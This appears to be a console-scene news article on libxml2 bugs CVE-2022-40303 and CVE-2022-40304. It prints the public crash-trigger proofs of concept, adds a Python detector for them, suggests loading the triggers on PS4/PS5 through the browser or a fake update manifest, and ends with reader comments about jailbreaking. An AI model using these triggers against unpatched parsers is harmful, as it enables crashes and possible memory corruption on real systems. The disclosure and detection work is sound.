Freshly revealed vulnerabilities could impact PS4 and PS5

Google Project Zero has reported new vulnerabilities in libxml2, an open source library used on the PS4 (and possibly on the PS5).
Libxml2 vulnerabilities could impact PS4, PS5
Google Project Zero is the infosec team at Google that studies zero-day vulnerabilities in mainstream software and hardware. Earlier today they reported two potentially exploitable vulnerabilities in libxml2, an open source library used to parse XML files. Incidentally, one of the reports is from Ned “nedwill” Williamson, of 3DS Soundhax and iOS 12.2 exploits fame, now an infosec engineer at Google.
Libxml2 is listed as one of the PS4’s Open Source dependencies. We assume it is used on the PS4 to parse some manifest files, such as the update manifests the console fetches regularly to check for firmware updates. Although libxml2 is not explicitly named among the PS5 dependencies, it is used in WebKit, a critical part of both the PS4’s and the PS5’s Web Browsers.
It’s not entirely clear whether those dependencies are actually used in the PS4 and PS5 browsers. However, references to libxml2 do exist in the PS5 WebKit source code, for example in the WebCore/xml directory.
As such, vulnerabilities in that library could be leveraged for exploits on the PS4 and PS5, assuming it is indeed used on the consoles. Tests are required (see below), which hopefully some good souls will be running in the days or weeks to come, to confirm whether anything can be done with those bugs.
Libxml2 Vulnerabilities that could be exploitable on PlayStation consoles
Earlier this year, Google Project Zero reported critical vulnerabilities in libxml2. A few hours ago, these bugs were publicly disclosed. Specifically, the bugs are as follows:
[CVE-2022-40303] – Integer overflow in xmlParseNameComplex
libxml2 is vulnerable to an integer overflow in `xmlParseNameComplex` when an attribute list has a very long name (name is >= 2**32 characters).
- PoC (generates a 2 GB file whose attribute name is 0x80000000 characters long):

```shell
$ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > name_big.xml
```
- Report: https://bugs.chromium.org/p/project-zero/issues/detail?id=2336
- Bug fix: https://github.com/GNOME/libxml2/commit/ffaec75809a315457891a0e54f8828bc6e056067
[CVE-2022-40304] – Double-free in libxml2 when parsing default attributes
- PoC:

```xml
<!DOCTYPE A SYSTEM "" [
<!ENTITY ENT_A SYSTEM "" NDATA A>
<!ENTITY ENT_B "&ENT_A;&ENT_B;">
<!ATTLIST A C CDATA "">
<!ATTLIST A D CDATA "">
<!ATTLIST A E CDATA "">
<!ATTLIST A F CDATA "">
<!ATTLIST A G CDATA "&ENT_B;">
]>
```
- Report: https://bugs.chromium.org/p/project-zero/issues/detail?id=2335
- Bug fix: https://github.com/GNOME/libxml2/commit/644a89e080bced793295f61f18aac8cfad6bece2
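As an added example (not the article’s own code and not part of libxml2), here is a Python pre-parse screen that flags documents shaped like the two PoCs above, so untrusted XML can be triaged on a host whose libxml2 is still older than 2.10.3. The name limit XML_MAX_NAME_LENGTH and the XML_PARSE_HUGE detail are libxml2 facts; the sample document and all finding labels are constructed for this example.

```python
import re

# Added example (not from the article or from libxml2): a coarse pre-parse screen
# for the two PoC shapes shown above, to triage untrusted XML on a parser not yet updated.
ENTITY_RE = re.compile(rb'<!ENTITY\s+(\w+)\s+(?:"([^"]*)"|SYSTEM\s+"[^"]*"(\s+NDATA\s+\w+)?)')
ATTLIST_RE = re.compile(rb'<!ATTLIST\s+\w+\s+(\w+)\s+\w+\s+(?:#\w+|"([^"]*)")')
REF_RE = re.compile(rb'&(\w+);')
FIXED_LIBXML2 = (2, 10, 3)  # both CVEs above are fixed in libxml2 2.10.3

# Constructed sample with the same structure as the CVE-2022-40304 PoC.
SAMPLE_40304 = b'''<!DOCTYPE A SYSTEM "" [
<!ENTITY ENT_A SYSTEM "" NDATA A>
<!ENTITY ENT_B "&ENT_A;&ENT_B;">
<!ATTLIST A C CDATA "">
<!ATTLIST A G CDATA "&ENT_B;">
]>'''

def libxml2_is_fixed(version):
    """True when a (major, minor, micro) libxml2 version carries the fixes."""
    return tuple(version) >= FIXED_LIBXML2

def triage(doc, max_name_len=50_000):
    """Return findings for the internal DTD subset of `doc` (bytes). The default
    limit is libxml2's XML_MAX_NAME_LENGTH; longer names only reach the parser
    when XML_PARSE_HUGE lifts it, which is the CVE-2022-40303 setting."""
    findings = []
    entities = {}  # name -> (replacement text, declared with NDATA)
    for name, text, ndata in ENTITY_RE.findall(doc):
        entities[name] = (text, bool(ndata))
    # Shape 1: an attribute name far beyond any sane length.
    for name, default in ATTLIST_RE.findall(doc):
        if len(name) > max_name_len:
            findings.append(f"oversized-name:{len(name)}")
    # Shape 2: an entity whose replacement text references itself.
    for name, (text, _) in entities.items():
        if name in REF_RE.findall(text):
            findings.append(f"self-referencing-entity:{name.decode()}")
    # Shape 2, continued: an attribute default that expands, possibly through
    # other entities, to an unparsed NDATA entity (ENT_B -> ENT_A in the PoC).
    for name, default in ATTLIST_RE.findall(doc):
        seen, todo = set(), REF_RE.findall(default)
        while todo:
            ref = todo.pop()
            if ref in seen or ref not in entities:
                continue
            seen.add(ref)
            text, unparsed = entities[ref]
            if unparsed:
                findings.append(f"default-expands-to-unparsed:{name.decode()}")
            todo.extend(REF_RE.findall(text))
    return findings
```

Running `triage(SAMPLE_40304)` reports both the self-referencing entity and the attribute default that expands to the NDATA entity; a well-formed document with ordinary entities yields no findings.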
Other libxml2 vulnerabilities
Looking at the recent history of the libxml2 repository, a few other commits to the codebase look interesting from an exploitation perspective (those issues were not reported as part of the recent Google Project Zero report):
All 4 of these vulnerabilities are fresh, fixed in Q3 2022.
Are the PS5 and PS4 really vulnerable to these bugs?
At this moment, these are just promising leads that came from the infosec world, for a specific open source library that might, or might not, be used on the PS4 and PS5. The first step would be to verify that. Someone needs to set up test environments that could trigger the potential crashes. This requires either using the integrated Web Browser on the consoles to load the PoC files, or finding more clever ways to load these files (e.g. creating a fake update XML manifest and having the console download it). Where PoC files are not provided, they also need to be created.
It is unclear whether the PS4 and PS5 actually use libxml2 in a way that could trigger these bugs (in the case of the PS5, it’s actually unclear whether it uses libxml2 at all), so that first needs to be verified with the tests described above. If that gets confirmed, whether those bugs could actually be turned into exploits then becomes a huge question. Parsing bugs in XML, even if they are confirmed, might not be leveraged as “easily” as typical WebKit vulnerabilities.
If you happen to have the time and skills to run those tests, by all means give it a try, and post your results 🙂
Luckily I don’t have a PS5 yet
WAITING FOR SOMEONE TO TEST THIS… RELEASE AN EXPLOIT FOR PS4 9.03, one year of waiting
Damn, I have a 500 Million LE PS4 (4 sleepless refresh nights) at MSRP, then 1x PS5 from PS Direct (Horizon Bundle) at MSRP, and now I added the STILL sealed God of War new PS5 Disc Edition to my IKEA showcase! (alongside my Dreamcast + PS2 + BC PS3 + etc..)
I’m a collector, I understand your pain. I bought an OG PS4 on eBay on 5.00, for a reasonable price, updated to 5.05 and it WAS A DREAM!
Gifted it to someone I love, and now the PS4 500 Million is in the showcase, locked (had it on 7.02 to 9.00). I was so lucky, I waited and waited and did not care for the online.
A stupid friend made me update my PS4 to play that *** Genshin Impact, played once, never touched it again and lost the possibility to jailbreak, damn it anime rpg…. <='(
Oh man…. My wife did the same. I didn’t notice at that time…. Sad story
JUST WANT TO SAY TO ANYBODY THINKING ABOUT UPDATING THEIR PS4 SYSTEM SOFTWARE: IF YOU WANT TO HAVE ANY CHANCE OF A JAILBREAK AND ANY CHANCE OF ANY AWESOME POSSIBILITIES, DO NOT UPDATE UNDER ANY CIRCUMSTANCES. YOU WILL BE SHOOTING YOURSELF IN THE FOOT, GUARANTEED. RIGHT BEFORE THE 9.00 JAILBREAK CAME OUT I HAD UPDATED MY PS4 SYSTEM SOFTWARE; TWO DAYS LATER THE PS4 9.00 JAILBREAK WAS RELEASED.
I AM CURRENTLY ON SYSTEM SOFTWARE 10.01 AND I WILL NOT UPDATE EVER AGAIN. IT’S GOING TO BE A LONG TIME BEFORE I SEE A JAILBREAK, SO TAKE MY WORD FOR IT: DO NOT UPDATE UNDER ANY CIRCUMSTANCES, NOT WORTH IT.
THE DOWNSIDE OF NOT UPDATING: YOU WILL NOT BE ABLE TO PLAY ONLINE, YOU WILL NOT BE ABLE TO RE-ACTIVATE YOUR PS4 AFTER RESTORING, AND YOU WILL NOT BE ABLE TO USE THE ONLINE SAVE DATA STORAGE FROM PLAYSTATION NETWORK.
MY ADVICE TO EVERYBODY: DO NOT PAY FOR PLAYSTATION NETWORK IF YOU WANT TO JAILBREAK, BECAUSE CHANCES ARE YOU WILL HAVE TO STAY ON THE MOST UP-TO-DATE FIRMWARE TO CONTINUE TO USE IT. THE MORE YOU UPDATE, THE FURTHER AND FURTHER YOU GET FROM A JAILBREAK.
Simon is the damn best QUEBECOIS hacker, friends!
Big greetings, my buddy!